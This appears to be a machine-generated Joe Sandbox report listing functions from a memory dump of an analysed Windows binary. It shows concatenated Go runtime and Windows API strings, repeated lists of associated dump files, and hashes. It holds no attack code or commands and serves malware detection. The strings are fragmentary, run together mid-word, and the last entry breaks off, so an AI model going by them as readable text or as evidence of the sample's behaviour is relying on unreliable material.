Function 00B07640 Relevance: 5.2, Strings: 4, Instructions: 155COMMON

Download Yara Rule

Strings

non in-use span in unswept listcasgstatus: bad incoming valuesresetspinning: not a spinning mentersyscallblock inconsistent runtime: split stack overflow: ...additional frames elided...unsafe.String: len out of rangecannot assign requested address.lib section, xrefs: 00B0788A
runtime: bad span s.state=freedefer with d.fn != nilforEachP: P did not run fnwakep: negative nmspinningstartlockedm: locked to meentersyscall inconsistent inittask with no functionscorrupted semaphore ticketout of memory (stackalloc)shrinking stack in libcall, xrefs: 00B077FE
s.sweepgen= allocCount end tracegcProcessPrng, xrefs: 00B0782C
sweepgen= sweepgen , bound = , limit = tracefree(tracegc()exitThreadBad varintGC forced runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nanException ptrSize= targetpc= until pc=unknown pcruntime: ggoroutine terminated, xrefs: 00B07856

Memory Dump Source

Source File: 00000000.00000002.1922670879.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1922658209.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000000F22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000001499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923469307.00000000016F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923484342.00000000016F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923498205.00000000016FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923511349.00000000016FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923524456.00000000016FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923537015.00000000016FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923557216.0000000001728000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923570703.000000000172A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923583104.000000000172B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923596278.0000000001733000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001734000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000173F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001777000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000177C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001839000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923838663.0000000001A47000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923852568.0000000001A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_5EvHHcMjRg.jbxd

Similarity

API ID:
String ID: s.sweepgen= allocCount end tracegcProcessPrng$ sweepgen= sweepgen , bound = , limit = tracefree(tracegc()exitThreadBad varintGC forced runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nanException ptrSize= targetpc= until pc=unknown pcruntime: ggoroutine terminated$non in-use span in unswept listcasgstatus: bad incoming valuesresetspinning: not a spinning mentersyscallblock inconsistent runtime: split stack overflow: ...additional frames elided...unsafe.String: len out of rangecannot assign requested address.lib section$runtime: bad span s.state=freedefer with d.fn != nilforEachP: P did not run fnwakep: negative nmspinningstartlockedm: locked to meentersyscall inconsistent inittask with no functionscorrupted semaphore ticketout of memory (stackalloc)shrinking stack in libcall
API String ID: 0-29889940
Opcode ID: 00f7a94a4fe14e45bf8ab2d583e42d57065ec24b5a29cbf7da5a52c7c251cc59
Instruction ID: b048744f1e1255b96b5eb63b646094278910a88f4dda0bd59f766cca4b42d2ef
Opcode Fuzzy Hash: 00f7a94a4fe14e45bf8ab2d583e42d57065ec24b5a29cbf7da5a52c7c251cc59
Instruction Fuzzy Hash: 1C6116B454D7459FC344EF28C190A6ABBE0AF89304F4089ADF8D987392DB34E948DF52

Function 00B40DD0 Relevance: 5.1, Strings: 4, Instructions: 135COMMON

Download Yara Rule

Strings

...additional frames elided...unsafe.String: len out of rangecannot assign requested address.lib section in a.out corruptedW. Central Africa Standard TimeCentral Brazilian Standard TimeMountain Standard Time (Mexico)wmi: create object returned nilcannot send , xrefs: 00B40F09
[originating from goroutine file descriptor in bad statedestination address requiredprotocol driver not attachedCertCreateCertificateContextCanada Central Standard TimeCen. Australia Standard TimeAus Central W. Standard TimeCentral Europe Standard TimeEnglish , xrefs: 00B40DFC
]:???pc= GSunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOctNovDecUTCEET+00+01CATWATEATGMTHSTHDT-03-04-05ESTCSTCDTMSTMDT-02EDTASTADTPSTPDTNSTNDT+06+03+04+07IST+09+08IDT+12PKT+11KST+05JST+10-01-11-12-08-09+13CETBSTMSK-06+14StdDltPUTKeyTags3-): subHanLaoMroNk, xrefs: 00B40E26
2, xrefs: 00B40EFD

Memory Dump Source

Source File: 00000000.00000002.1922670879.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1922658209.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000000F22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000001499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923469307.00000000016F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923484342.00000000016F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923498205.00000000016FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923511349.00000000016FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923524456.00000000016FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923537015.00000000016FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923557216.0000000001728000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923570703.000000000172A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923583104.000000000172B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923596278.0000000001733000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001734000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000173F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001777000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000177C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001839000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923838663.0000000001A47000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923852568.0000000001A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_5EvHHcMjRg.jbxd

Similarity

API ID:
String ID: ...additional frames elided...unsafe.String: len out of rangecannot assign requested address.lib section in a.out corruptedW. Central Africa Standard TimeCentral Brazilian Standard TimeMountain Standard Time (Mexico)wmi: create object returned nilcannot send $2$[originating from goroutine file descriptor in bad statedestination address requiredprotocol driver not attachedCertCreateCertificateContextCanada Central Standard TimeCen. Australia Standard TimeAus Central W. Standard TimeCentral Europe Standard TimeEnglish $]:???pc= GSunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOctNovDecUTCEET+00+01CATWATEATGMTHSTHDT-03-04-05ESTCSTCDTMSTMDT-02EDTASTADTPSTPDTNSTNDT+06+03+04+07IST+09+08IDT+12PKT+11KST+05JST+10-01-11-12-08-09+13CETBSTMSK-06+14StdDltPUTKeyTags3-): subHanLaoMroNk
API String ID: 0-2342688139
Opcode ID: 2057a2c9691660f013bbff2fd7c616ac77e9b07f1b71b93eeb213ab2c5ccf2d5
Instruction ID: 65604e12a68f1d3cdef2ca3d87d4fc4aea1cee92dd5545fdae093911eb3eb66c
Opcode Fuzzy Hash: 2057a2c9691660f013bbff2fd7c616ac77e9b07f1b71b93eeb213ab2c5ccf2d5
Instruction Fuzzy Hash: A151D3B4A4C3419FC314EF69C190A1ABBE1BF88704F5489ADF8C887356D734D948EB52

Function 00AF5FF0 Relevance: 5.1, Strings: 4, Instructions: 121COMMON

Download Yara Rule

Strings

runtime: failed to commit pages/memory/classes/heap/free:bytes/memory/classes/os-stacks:bytespacer: sweep done at heap size non in-use span in unswept listcasgstatus: bad incoming valuesresetspinning: not a spinning mentersyscallblock inconsistent runtime: spl, xrefs: 00AF61C3
runtime: VirtualAlloc of /sched/gomaxprocs:threadsremaining pointer buffersslice bounds out of range_cgo_thread_start missingallgadd: bad status Gidleruntime: program exceeds startm: p has runnable gsstoplockedm: not runnablereleasep: invalid p statecheckdead:, xrefs: 00AF60E5, 00AF6165
out of memory is nil, not value method bad map state span.base()=bad flushGen , not pointer != sweepgen MB globals, work.nproc= work.nwait= nStackRoots= flushedWork double unlock s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=, xrefs: 00AF6143
bytes failed with errno=runtime: VirtualAlloc of /sched/gomaxprocs:threadsremaining pointer buffersslice bounds out of range_cgo_thread_start missingallgadd: bad status Gidleruntime: program exceeds startm: p has runnable gsstoplockedm: not runnablereleasep: , xrefs: 00AF610F, 00AF618F

Memory Dump Source

Source File: 00000000.00000002.1922670879.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1922658209.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000000F22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000001499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923469307.00000000016F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923484342.00000000016F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923498205.00000000016FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923511349.00000000016FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923524456.00000000016FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923537015.00000000016FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923557216.0000000001728000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923570703.000000000172A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923583104.000000000172B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923596278.0000000001733000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001734000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000173F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001777000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000177C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001839000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923838663.0000000001A47000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923852568.0000000001A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_5EvHHcMjRg.jbxd

Similarity

API ID:
String ID: bytes failed with errno=runtime: VirtualAlloc of /sched/gomaxprocs:threadsremaining pointer buffersslice bounds out of range_cgo_thread_start missingallgadd: bad status Gidleruntime: program exceeds startm: p has runnable gsstoplockedm: not runnablereleasep: $out of memory is nil, not value method bad map state span.base()=bad flushGen , not pointer != sweepgen MB globals, work.nproc= work.nwait= nStackRoots= flushedWork double unlock s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=$runtime: VirtualAlloc of /sched/gomaxprocs:threadsremaining pointer buffersslice bounds out of range_cgo_thread_start missingallgadd: bad status Gidleruntime: program exceeds startm: p has runnable gsstoplockedm: not runnablereleasep: invalid p statecheckdead:$runtime: failed to commit pages/memory/classes/heap/free:bytes/memory/classes/os-stacks:bytespacer: sweep done at heap size non in-use span in unswept listcasgstatus: bad incoming valuesresetspinning: not a spinning mentersyscallblock inconsistent runtime: spl
API String ID: 0-82273310
Opcode ID: c8213c371a5627c24f288abf75cf546478fb4b828327311e256ecc87949127d1
Instruction ID: bb2c0df785f0ff79a48733b5c286ddbaa899c62913980e4ee1fec42f2a9695e2
Opcode Fuzzy Hash: c8213c371a5627c24f288abf75cf546478fb4b828327311e256ecc87949127d1
Instruction Fuzzy Hash: 4351E1B42597099FC340EFA4C09576ABBE0AB88344F90896DF589C3341EB749988DF93

Function 00B33540 Relevance: 5.1, Strings: 4, Instructions: 105COMMON

Download Yara Rule

Strings

bad status in shrinkstackmissing traceGCSweepStartresource deadlock avoidedoperation now in progressno buffer space availableno such device or addresssocket type not supportedinvalid cross-device linkGetFinalPathNameByHandleWGetQueuedCompletionStatusUpdateProc, xrefs: 00B33685
shrinkstack at bad timereflect.methodValueCalldevice or resource busyinterrupted system callno space left on deviceoperation not supportedoperation not permittedCertGetCertificateChainFreeEnvironmentStringsWGetEnvironmentVariableWGetSystemTimeAsFileTimeSetEnvi, xrefs: 00B3366F
shrinking stack in libcallruntime: pcHeader: magic= traceRegion: out of memoryinvalid request descriptorno CSI structure availablerequired key not availableno message of desired typename not unique on networkCertFreeCertificateContextPostQueuedCompletionStatus, xrefs: 00B33659
missing stack in shrinkstack args stack map entries for invalid runtime symbol tableruntime: no module data for traceRegion: alloc too large[originating from goroutine file descriptor in bad statedestination address requiredprotocol driver not attachedCertCrea, xrefs: 00B3369B

Memory Dump Source

Source File: 00000000.00000002.1922670879.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1922658209.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000000F22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000001499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923469307.00000000016F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923484342.00000000016F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923498205.00000000016FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923511349.00000000016FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923524456.00000000016FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923537015.00000000016FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923557216.0000000001728000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923570703.000000000172A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923583104.000000000172B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923596278.0000000001733000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001734000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000173F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001777000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000177C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001839000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923838663.0000000001A47000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923852568.0000000001A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_5EvHHcMjRg.jbxd

Similarity

API ID:
String ID: bad status in shrinkstackmissing traceGCSweepStartresource deadlock avoidedoperation now in progressno buffer space availableno such device or addresssocket type not supportedinvalid cross-device linkGetFinalPathNameByHandleWGetQueuedCompletionStatusUpdateProc$missing stack in shrinkstack args stack map entries for invalid runtime symbol tableruntime: no module data for traceRegion: alloc too large[originating from goroutine file descriptor in bad statedestination address requiredprotocol driver not attachedCertCrea$shrinking stack in libcallruntime: pcHeader: magic= traceRegion: out of memoryinvalid request descriptorno CSI structure availablerequired key not availableno message of desired typename not unique on networkCertFreeCertificateContextPostQueuedCompletionStatus$shrinkstack at bad timereflect.methodValueCalldevice or resource busyinterrupted system callno space left on deviceoperation not supportedoperation not permittedCertGetCertificateChainFreeEnvironmentStringsWGetEnvironmentVariableWGetSystemTimeAsFileTimeSetEnvi
API String ID: 0-2613220513
Opcode ID: 2e749e41bebcc680839cf3e2d9131f5b554d43c50967c886897767237108e1f2
Instruction ID: bfb6f0d4dec37566f73637619c75b4b85c77e108c9177e5939a4d72f117b346f
Opcode Fuzzy Hash: 2e749e41bebcc680839cf3e2d9131f5b554d43c50967c886897767237108e1f2
Instruction Fuzzy Hash: EB4182746087009FDB18DF24D1D6A6A77E1FF88B04F6548ACE8498B351E734EE48DB42

Function 00B0CAB0 Relevance: 5.1, Strings: 4, Instructions: 95COMMON

Download Yara Rule

Strings

runtime: summary max pages = runtime: levelShift[level] = doRecordGoroutineProfile gp1=timeBegin/EndPeriod not foundruntime: sudog with non-nil cgfput: bad status (not Gdead)LockOSThread nesting overflowsemacquire not on the G stackruntime: split stack overflo, xrefs: 00B0CBEF
runtime: root level max pages = WSAGetOverlappedResult not found_cgo_pthread_key_created missingruntime: sudog with non-nil elemruntime: sudog with non-nil nextruntime: sudog with non-nil prevruntime: mcall function returnedruntime: newstack called from g=runt, xrefs: 00B0CBA9
+, xrefs: 00B0CC2C
root level max pages doesn't fit in summaryruntime: releaseSudog with non-nil gp.paramunknown runnable goroutine during bootstrapruntime: casfrom_Gscanstatus bad oldval gp=runtime:stoplockedm: lockedg (atomicstatus=methodValueCallFrameObjs is not in a modulein, xrefs: 00B0CC23

Memory Dump Source

Source File: 00000000.00000002.1922670879.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1922658209.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000000F22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000001499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923469307.00000000016F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923484342.00000000016F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923498205.00000000016FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923511349.00000000016FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923524456.00000000016FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923537015.00000000016FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923557216.0000000001728000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923570703.000000000172A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923583104.000000000172B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923596278.0000000001733000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001734000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000173F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001777000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000177C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001839000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923838663.0000000001A47000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923852568.0000000001A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_5EvHHcMjRg.jbxd

Similarity

API ID:
String ID: +$root level max pages doesn't fit in summaryruntime: releaseSudog with non-nil gp.paramunknown runnable goroutine during bootstrapruntime: casfrom_Gscanstatus bad oldval gp=runtime:stoplockedm: lockedg (atomicstatus=methodValueCallFrameObjs is not in a modulein$runtime: root level max pages = WSAGetOverlappedResult not found_cgo_pthread_key_created missingruntime: sudog with non-nil elemruntime: sudog with non-nil nextruntime: sudog with non-nil prevruntime: mcall function returnedruntime: newstack called from g=runt$runtime: summary max pages = runtime: levelShift[level] = doRecordGoroutineProfile gp1=timeBegin/EndPeriod not foundruntime: sudog with non-nil cgfput: bad status (not Gdead)LockOSThread nesting overflowsemacquire not on the G stackruntime: split stack overflo
API String ID: 0-1754101818
Opcode ID: f568f78cebc5806ff96e5c898e532eb0a183743fd70b61c55119413d22d76075
Instruction ID: f99b0e1c4f810fa26fc354e6fc42a7fb435f3a14c46cd22c791a027ffab5b412
Opcode Fuzzy Hash: f568f78cebc5806ff96e5c898e532eb0a183743fd70b61c55119413d22d76075
Instruction Fuzzy Hash: 444108B46087458FC308EF64C096AAABFE0FF88704F5589ADE4C987352D734D984DB92

Function 00B3DF70 Relevance: 5.1, Strings: 4, Instructions: 86COMMON

Download Yara Rule

Strings

runtime: goid= in goroutine file too largelevel 2 haltedlevel 3 haltedtoo many linksno such deviceprotocol errortext file busytoo many usersCryptGenRandomCertCloseStoreCreateProcessWFindFirstFileWFormatMessageWGetConsoleModeGetProcAddressProcess32NextWSetFileP, xrefs: 00B3E091
attempted to trace a bad status for a goroutineattempting to link in too many shared librariesunable to get usable HTTP transport from clientRtlDosPathNameToRelativeNtPathName_U_WithStatusbufio: reader returned negative count from Readreflect.Value.Bytes of un, xrefs: 00B3E0C5
", xrefs: 00B3E04E
/, xrefs: 00B3E0CE

Memory Dump Source

Source File: 00000000.00000002.1922670879.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1922658209.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000000F22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000001499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014B2000.00000002.00000001.01000000.00000003.sdmpDownload File
